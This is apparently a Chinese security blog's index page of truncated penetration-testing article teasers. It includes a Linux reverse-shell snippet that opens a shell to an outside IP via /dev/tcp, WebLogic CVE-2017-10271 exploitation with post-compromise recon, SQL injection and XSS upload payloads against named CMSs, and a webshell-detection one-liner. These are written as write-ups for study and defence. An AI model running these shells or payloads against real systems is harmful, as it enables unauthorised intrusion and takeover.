API 接口渗透测试
1 API 接口介绍1.1 RPC(远程过程调用)远程过程调用(英语:Remote Procedure Call,缩写为 RPC)是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一台计算机的子程序,而程序员无需额外地为这个交互作用编程。如果涉及的软件采用面向对象编程,那么远程过程调用亦可称作远程调用或远程方法调用,例:Java RMI。RPC 一般直接使用 TCP 协议进行通信,通
linux反弹shell姿势
遇到linux服务器,马上想到反弹shell到本地进行溢出等提权尝试,这里搜集了一些常用的反弹姿势。首先,选一个未被目标防火墙过滤的TCP端口1attacker$ nc -l -v attackerip 4444Bash1/bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&11bash -i >&
Weblogic引发的血案-3
直接用WebLogic_Wls-Wsat_RCE_Exp.jarexp获取到shell,和上上篇文章一样。信息收集hostname -->BX1systeminfo -->Windows Server 2012 R2 Standard 169补丁ipconfig -->192.168.2.23 whoami & net localgroup administrators
Weblogic引发的血案二
直接用WebLogic_Wls-Wsat_RCE_Exp.jarexp获取到shell,和上一篇文章一样。信息收集hostname -->OXXXsysteminfo -->Windows Serverr 2008 Standard x64ipconfig -->192.168.101.3whoami & net localgroup administrators --&
Weblogic引发的血案
在某次测试中发现了某某站点开了7001端口的Weblogic服务,于是。。。漏洞验证与利用运用payload向其写入shellroot@kali:~/Desktop/Oracle-WebLogic-CVE-2017-10271-master# java -jar WebLogic_Wls-Wsat_RCE_Exp.jar http://xxx.xxx.xxx:7001 abc.jsp[*] Sta
使用Semmle QL进行漏洞探索 Part2
这篇文章讨论了一个我们如何主动使用它的例子,包括Azure固件组件的安全审计。这是Azure服务深度安全审查的更广泛防御的一部分,从假设对手的角度探索攻击向量,该对手已经渗透了至少一个安全边界,现在位于服务后端的操作环境中(在下图中用*标记)。本次审查的目标之一是基于Linux的嵌入式设备,它与服务后端和管理后端相连接,在两者之间传递操作数据。该设备的主要攻击面是两个接口上使用的管理协议。对其固件
无弹窗渗透测试实验
0x01 前渗透内网拓扑说明:10.101.101.0/24 网段模拟的是外网的地址192.168.101.0/24 网段模拟的是一个小型企业的内网中的应用服务器网络192.168.111.0/24 网段模拟的是一个小型企业的内网中的办公网络企业内网可以无限制的访问到外网,但是外网无法访问到企业内网办公网可以无限制的访问到应用服务器网络,但是应用服务器网络无
TheCarProject CMS SQl注入
从Poc开始从exploit-db上看到了这个CMS的漏洞,主要是其中的SQL注入比较多,首先将所有的Poc放出来一个接一个分析。http://localhost/TheCarProject/cp/info.php?man_id=3&car_id=-1or 1=1 and (SELECT 1 and ROW(1,1)>(SELECTCOUNT(*),CONCAT(CHAR(95)
ctcms任意文件上传
漏洞位置: 个人中心-资料设置-资料修改-头像处漏洞证明:选择任意图片上传,拦截保存修改请求包:修改数据包中内容:将filename设置为x.html参数内容为:<html><head><imgsrc=x onerror=alert(1)></head></html>放过所有请求后,查看头像图片的URL,已经变成了刚才上传的文件url:访
Perl oneline 查杀Webshell
根据Webshell中的一些特征字段进行搜索,就可以搜出可能含有木马的的文件,特征字段可自行根据需要添加。perl -lne 'print "$ARGV $_" if/(phpspy|c99sh|milw0rm|eval/(gunerpress|eval/(base64_decoolcode|spider_bc)/&nb